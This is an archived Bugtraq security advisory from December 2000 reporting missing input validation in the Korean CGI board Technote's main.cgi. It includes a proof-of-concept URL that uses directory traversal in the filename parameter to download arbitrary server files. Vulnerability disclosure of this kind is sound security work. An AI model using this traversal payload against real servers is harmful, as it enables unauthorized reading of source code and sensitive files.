[18360] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[Ksecurity Advisory] main.cgi in technote

daemon@ATHENA.MIT.EDU (Ksecurity)
Wed Dec 27 20:21:34 2000

Message-Id:  <20001227142753.6419.qmail@securityfocus.com>
Date:         Wed, 27 Dec 2000 14:27:53 -0000
Reply-To: ksecurity@ILAND.CO.KR
From: Ksecurity <ksecurity@ILAND.CO.KR>
To: BUGTRAQ@SECURITYFOCUS.COM

Ksecurity Advisory

subject: Insecure input validation in technote main.cgi 
affected version:technote 2000
maybe technote 2001


technote is a famous korea cgi board.

http://www.technote.co.kr

in main.cgi ,failed properly validate user input 
which arguments a call to open(). 

FREE_BOARD is a default db

http://localhost/technote/main.cgi/oops?
board=FREE_BOARD&command=
down_load&filename=/../../../main.cgi


vendor status
reported bug to e-mail



In OpenBSD land, the pain is quick, at least.
                                             -- Theo de Raadt ;)

regards
Ksecurity(korea security group)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[18360] in bugtraq

[Ksecurity Advisory] main.cgi in technote

daemon@ATHENA.MIT.EDU (Ksecurity)Wed Dec 27 20:21:34 2000

daemon@ATHENA.MIT.EDU (Ksecurity)
Wed Dec 27 20:21:34 2000